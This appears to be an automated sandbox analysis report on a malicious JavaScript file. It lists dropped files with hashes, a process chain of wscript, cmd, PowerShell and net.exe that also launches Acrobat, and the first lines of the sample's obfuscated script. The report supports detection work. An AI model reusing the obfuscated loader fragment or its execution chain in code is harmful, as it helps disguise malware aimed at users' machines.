C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.261152483369608 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJf21rPeUkwRe9:YvXKXhhBV2UTbdXG+16Ukee9 |
MD5: | C142B902859AC71F872ECBF5F192D996 |
SHA1: | 9B5991A217AB63668B21FA58537DBC3553B7DE3A |
SHA-256: | 8E88A386045767B46B0FE49D3D16C75347CE538B4EEF4A5E9663EC420AEB0233 |
SHA-512: | 3579EFAA0517DB547827777010FAF0D82DB8EDCFB687BD039374C9ACD243739E45B41ECA543ED8B57BADFFD6351F1B683D6117C174600EB4CBD0AC8923AEC7F9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.66009851033282 |
Encrypted: | false |
SSDEEP: | 24:Yv6XhIUXuamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS2l:YvsIwwBgkDMUJUAh8cvM2l |
MD5: | A466AD30A05F9AE1AFA8A2F80638BECD |
SHA1: | AE5A78906A3CB3B4536FB2C3858309A582A95E51 |
SHA-256: | A8DCB01136B4EC06CF8FC8C958A8F992C19E1D2938BBEDA03D885468CEA57312 |
SHA-512: | 6ED4DF9259EBE5B332B8B036FBB4DD5709F56E28644A83B5E1ED7A2C7EB6694A5FA2FC1CA428B292B6F72FB8533C54396AAA489C8FAAEDCC5971831DC7D1A0B7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.236209716991244 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJfshHHrPeUkwRe9:YvXKXhhBV2UTbdXGUUUkee9 |
MD5: | 72B2E4581975CFA0F4A9F381868424ED |
SHA1: | 38F431783DC49EEA3A8EAF0D8E1002C4A0D7C39F |
SHA-256: | 31E4876F9F21E2012E921F143459E61081ED74D979B4B289C4F6F8DC8166168D |
SHA-512: | 2177D54B82663FB3C45D48DDE3A8F0C469201DC2FD4AD01F30DCA361E9E4133E0E158E780356C8E18D7076924DD828E63A2156DBE6C2EC774991A4F67D21347A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.240614640285535 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXh79wqV2UXjb24kF0YAUoAvJTqgFCrPeUkwRe9:YvXKXhhBV2UTbdXGTq16Ukee9 |
MD5: | CE4E7CA706C5212D7CBAEB0ED3F487D7 |
SHA1: | 83B28C0C02D24B0E883A2ED6C1C368B230FAF994 |
SHA-256: | E769D54C10402B22F6E9AB5BB7224B77EAAA79078B150E60AFC7BA5E9BA2574F |
SHA-512: | E49A5043BF857C3ED2DAA6D96B56730FFF72AD7616072FA7C295861AFF27CCAA80E3F30C04D5BF18A96A414E187F56819930D038804B1AD224F40C64ECBF01AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.128018253957593 |
Encrypted: | false |
SSDEEP: | 48:YY6prnhPCgSABaNevCfwkYvM9J49uJcG+btcWzfub9TTa:+pjZoIkY0L+2rK |
MD5: | 31F07EF9C155BFD852355FBDAC0BC3C2 |
SHA1: | A2967C032BABE79A6B8D15CC15D36BEA4832D7F9 |
SHA-256: | 3F44E819E439D7E35FDC666E72AA587C6959FEEDF6D0F41A158640AB7936E0D1 |
SHA-512: | 7F5FA59103A505EBB5DFA85985789A8458740DCF7C8EA77A11909E8A0CC2A26C6EB6B3336D0F31B98567E6B495C0F962C4EFFDA4E8A462C02479261CA57FCADF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.3204460117346086 |
Encrypted: | false |
SSDEEP: | 24:TLKufx/XYKQvGJF7urs9O3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6Ysv/+EXSqXH:TGufl2GL7msUKB0M0+Tb608YTrC |
MD5: | B7620A9B83C876ECC14CE7A8482B035C |
SHA1: | 9BC876A182E2626A68C068D40D2B8609DAE94625 |
SHA-256: | B11DC80DBF88F180C36D7CAC521D2C90E6A2E00549E7788973E139CAE42A9379 |
SHA-512: | 4B9DCE20C396314548A2780171BF98C9A6FCB52FECB4978DB5983093D1EF3096B01F63D5E96EE95A45887BF37AF906B219FD58BD72BD7B47433DF56AD7E1FD08 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.7825751330426118 |
Encrypted: | false |
SSDEEP: | 24:7+t2l3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6Ysv//EXSqXlyGKaiIqLhx/XYKQA:7M0KB0M0+Tb608YKrGK0qFl2GL7msH |
MD5: | 1810979E14D0340CF258418B44FE4619 |
SHA1: | 5A92AFA4315D8580CD1517B5EE2488598D854408 |
SHA-256: | DA04711DC13F8A643075C384BF4C1F404E01DE029846CBFD2AB19F47AFC8E71F |
SHA-512: | B5DBA4029C5FFFD6D7D5F32A0AEA8AD1B4647E77310122EDB97101C7ED98B8B4B5796A113EDB5BCA5E480C11DBF7B6983E90C0C720F39B43E240187E1165E03A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgJwFF+YGluMkM0MJq/lsmEEA+iLYyu:6a6TZ44ADEWFgYwuMkM0MI9sK |
MD5: | 869CCDBCF94CE7FA937CFB98AFFBF344 |
SHA1: | EE7F2B9DA600BA86D0B0CF0BC742BEF7430C653F |
SHA-256: | 34F81A115C2320A643365DECA3F0CF9A73236E46A1C5AB76D1F1FBEEAAE207E4 |
SHA-512: | 112B6EE7F75C84A365E08900CD916613BBD74439EBFACAFEFFD4912672AAD10E8ECE55FF47FCA39DFD5FD4AD7E8A5213BB9969B10FFAC367FD26E9E6020E714E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulJnp/p:NllU |
MD5: | BC6DB77EB243BF62DC31267706650173 |
SHA1: | 9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF |
SHA-256: | 5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27 |
SHA-512: | 91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5097251598291805 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClE9Tw:Qw946cPbiOxDlbYnuRK+bD6 |
MD5: | C6B41AA30D7D3EBC21488C517EF25890 |
SHA1: | AF4C167E3E2EC7668EF7F1272933B09733AF8282 |
SHA-256: | 878B3DE381179B2F440C3F61472E4949DC20BFEE6B40CB118F0595EF533892C5 |
SHA-512: | 3BB81567348B14227A8315AD0B114E2E47BA9477CBC774DABD9D0CCC5202FA2FB4128EDB4EB1B780C940FB8DCE820AEECAEB79E5A85A54452E25929C7C9C3AD9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 19-23-23-627.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.361022727805069 |
Encrypted: | false |
SSDEEP: | 384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5 |
MD5: | 70A2D078BEFD5E910EE035832171B399 |
SHA1: | 1AB91914ECD7852E512C73437D30013594A16FB0 |
SHA-256: | 2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED |
SHA-512: | 9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.365846474810237 |
Encrypted: | false |
SSDEEP: | 384:yBtYkY16Vhyaf5dSlLzmu5yqf/aySeudadzRP3xaXRG15fN35ow/5/6rGgmXWtlV:4u2 |
MD5: | FD426167A81C1DDFC57432DC5422C8F2 |
SHA1: | 0C2D9BB108A56BED8DAA29E108FF200D311D93A2 |
SHA-256: | 864121BAD5F61CA0C4E0E452A38D59B612BA8500F6973258A2C568AE579EF472 |
SHA-512: | 8C3C2E46009DB7EF024F72D28B49B9DC507F9D133120DDD1BD0C91C9FE56A8FEEB0900CAC5EADC86F74E755087AE929F975D1E8B3F14492DDE9097B8B53D20B8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.398820174048098 |
Encrypted: | false |
SSDEEP: | 192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3ZmD:EGvIcNYdRTtAcDM |
MD5: | 066371A40A4ED353C0294384B17ADAAE |
SHA1: | 4B201BA6570BF05E8E1021D7E65203A1FB08F9B5 |
SHA-256: | 4A16AF1889561F60CFE9C8274C277B4C0ABED3B807DAFDC6B6AE2EE153FECE7A |
SHA-512: | 896A20AB42DAEF29D9C423CF2BAB535DFFED9F48BCCB8A675952E7E7327E425D2DBEFC9C8F370AA57CF23F883B1F308136BB94DF6F187AC0E715FEFBDB1E909C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje |
MD5: | 716C2C392DCD15C95BBD760EEBABFCD0 |
SHA1: | 4B4CE9C6AED6A7F809236B2DAFA9987CA886E603 |
SHA-256: | DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8 |
SHA-512: | E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/2wYIGNPRmOWL07otGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:OwZGDbWLxtGZN3mlind9i4ufFXpAXkru |
MD5: | AA6641E4BFC58F44E603CD0EE74AE8FF |
SHA1: | 29F99293E45449226D99AE893FA31E428BA80BF8 |
SHA-256: | 0C9CEF808C626D2412A4548C0F78FAFD52A30D49C36E1ED1CDA2BBF0E1B5F2F1 |
SHA-512: | 65C9820CA8747BB78292D34D7AB4D1F26F73CA4D7DF2C97F3BD87D777B8D00E981AF6CEC2D078AF5BB660EEDE1480608EC701B6F55A1521C6390F42FFDE6D0A2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.910469922683865 |
TrID: | |
File name: | 7772104212868830459.js |
File size: | 21'632 bytes |
MD5: | 94edbd0df4789e5a215fcfe5ffb69994 |
SHA1: | d9667d34aaa5895e737af44e979b89386eed30ff |
SHA256: | 73f24beefb08987100c084b04ffedfd8fd9a2ea1024947c64b6f681775b5b3b6 |
SHA512: | a653788e2694875549b8e853a2293fadd025df1296a1a28057d6687a246095635dcd6c7edb86df0d0574b60ba2d9cfccd040e0d9de9d816d91f1be924bf0eac7 |
SSDEEP: | 384:SXCP9GXChJGxWNUNcmO/RQs1QfKV+zUkDpjKC2W8FXdb3TUAntgYttoaBulEj40T:SSGcrNUNcmL6gEjx+ZSs5Xtsmlfb2mWF |
TLSH: | 37A273D6DE1AC2175CE456FE8BED40E196F0828CCFFC40A17641E49D5E890B94AF86BC |
File Content Preview: | function xknww(){kulzfouev=[1031,3079,5127,4103,2055,3072];var dbjtkzxn=this[vsemy+qtekmfvx+xllgu+ztzbhfff+alqjjup+merptotqg+etlxskmah+jemzwy](this[ticrmoynt+sebpb+onnions+xllgu+bwmmlz+vsemy+jemzwy][twhklpydj+xllgu+alqjjup+qtekmfvx+jemzwy+alqjjup+qpezqz+d |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 19:23:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c2410000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 19:23:14 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6464c0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 19:23:14 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff620390000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 19:23:14 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b2bb0000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 19:23:19 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff64eb90000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 19:23:19 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6464c0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 19:23:19 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a25c0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 19:23:20 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63ec50000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 19:23:20 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7df220000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 19:23:20 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63ec50000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function xknww() { |
|
1 | kulzfouev = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var dbjtkzxn = this[vsemy + qtekmfvx + xllgu + ztzbhfff + alqjjup + merptotqg + etlxskmah + jemzwy] ( this[ticrmoynt + sebpb + onnions + xllgu + bwmmlz + vsemy + jemzwy][twhklpydj + xllgu + alqjjup + qtekmfvx + jemzwy + alqjjup + qpezqz + dmshjh + fsbocb + alqjjup + onnions + jemzwy] ( ticrmoynt + sebpb + onnions + xllgu + bwmmlz + vsemy + jemzwy + cvgsx + sebpb + khghrbeg + alqjjup + zcmygv + zcmygv ) [mtwrhkyq + alqjjup + kvxppc + mtwrhkyq + alqjjup + qtekmfvx + xfdgno] ( bgduqf + qhmqv + uszlrxjsv + cclovkiow + xxyhez + twhklpydj + nqfab + mtwrhkyq + mtwrhkyq + uszlrxjsv + gtgsda + jogymyo + xxyhez + nqfab + sebpb + uszlrxjsv + mtwrhkyq + qqqadzy + twhklpydj + flchh + etlxskmah + jemzwy + xllgu + flchh + zcmygv + qxulce + xpvqlujub + qtekmfvx + etlxskmah + alqjjup + zcmygv + qqqadzy + merptotqg + etlxskmah + jemzwy + alqjjup + xllgu + etlxskmah + qtekmfvx + jemzwy + bwmmlz + flchh + etlxskmah + qtekmfvx + zcmygv + qqqadzy + akkajecgz + flchh + onnions + qtekmfvx + zcmygv + alqjjup ), 16 ); |
|
